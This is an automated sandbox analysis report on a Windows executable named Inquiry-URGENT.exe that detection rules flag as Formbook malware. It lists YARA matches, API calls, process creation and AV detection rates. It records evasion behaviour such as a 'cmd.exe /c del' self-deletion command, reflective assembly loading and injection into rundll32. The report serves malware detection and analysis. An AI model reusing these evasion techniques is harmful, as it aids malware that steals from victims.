          Source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large strings
          Source: Inquiry-URGENT.exe, Utility.cs | Long String: Length: 34816
          Source: 2.2.Inquiry-URGENT.exe.710000.0.unpack, Utility.cs | Long String: Length: 34816
          Source: 2.0.Inquiry-URGENT.exe.710000.0.unpack, Utility.cs | Long String: Length: 34816
          Source: 3.0.Inquiry-URGENT.exe.5d0000.0.unpack, Utility.cs | Long String: Length: 34816
          Source: 3.2.Inquiry-URGENT.exe.5d0000.1.unpack, Utility.cs | Long String: Length: 34816
          Source: Inquiry-URGENT.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 2_2_010AF5D0
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 2_2_010AC184
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 2_2_010AE5CA
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 2_2_010AE5D0
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_00401030
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041D098
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041BA9A
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_00408C70
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041C496
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041BD4C
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_00402D90
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041BF9E
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_00402FB0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B2841F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BDD466
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B42581
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B2D5E0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE25DD
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B10D20
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE2D07
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE1D55
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE2EF7
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B36E30
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BDD616
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE1FF1
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BEDFCE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B420A0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE20A8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B2B090
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE28EC
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BEE824
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BD1002
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B34120
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B1F900
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE22AE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B4EBB0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BD03DA
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BDDBD2
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04BE2B28
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009BD098
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009BBA9A
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009A8C70
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009A2D90
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009BBD4C
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009BBF9E
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009A2FB0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 04B1B150 appears 45 times
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_004185B0 NtCreateFile,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_00418660 NtReadFile,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_004186E0 NtClose,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_00418790 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041880A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_004186DA NtClose,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_0041878A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_04B59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009B85B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009B86E0 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009B8660 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009B8790 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009B880A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009B86DA NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_009B878A NtAllocateVirtualMemory,
          Source: Inquiry-URGENT.exe | Binary or memory string: OriginalFilename vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000002.00000002.670471752.0000000000712000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameResourceTableMappingEntryField.exeP vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000002.00000002.675364064.0000000005BE0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000002.00000002.671314085.0000000002BBB000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameColladaLoader.dll4 vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe | Binary or memory string: OriginalFilename vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000003.00000000.669340059.00000000005D2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameResourceTableMappingEntryField.exeP vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000003.00000002.754490731.000000000307C000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000003.00000002.753164134.000000000117F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe | Binary or memory string: OriginalFilenameResourceTableMappingEntryField.exeP vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Inquiry-URGENT.exe | Virustotal: Detection: 36%
          Source: Inquiry-URGENT.exe | Metadefender: Detection: 22%
          Source: Inquiry-URGENT.exe | ReversingLabs: Detection: 71%
          Source: Inquiry-URGENT.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\Inquiry-URGENT.exe 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Process created: C:\Users\user\Desktop\Inquiry-URGENT.exe C:\Users\user\Desktop\Inquiry-URGENT.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Process created: C:\Users\user\Desktop\Inquiry-URGENT.exe C:\Users\user\Desktop\Inquiry-URGENT.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Inquiry-URGENT.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@13/7
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_01
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Inquiry-URGENT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Inquiry-URGENT.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP | source: Inquiry-URGENT.exe, 00000003.00000002.753164134.000000000117F000.00000040.00000001.sdmp, rundll32.exe, 00000008.00000002.939331902.0000000004C0F000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdb | source: Inquiry-URGENT.exe, 00000003.00000002.754416564.0000000003070000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb | source: Inquiry-URGENT.exe, 00000003.00000002.753164134.000000000117F000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdbGCTL | source: Inquiry-URGENT.exe, 00000003.00000002.754416564.0000000003070000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: Inquiry-URGENT.exe, Form1.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.Inquiry-URGENT.exe.710000.0.unpack, Form1.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.Inquiry-URGENT.exe.710000.0.unpack, Form1.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
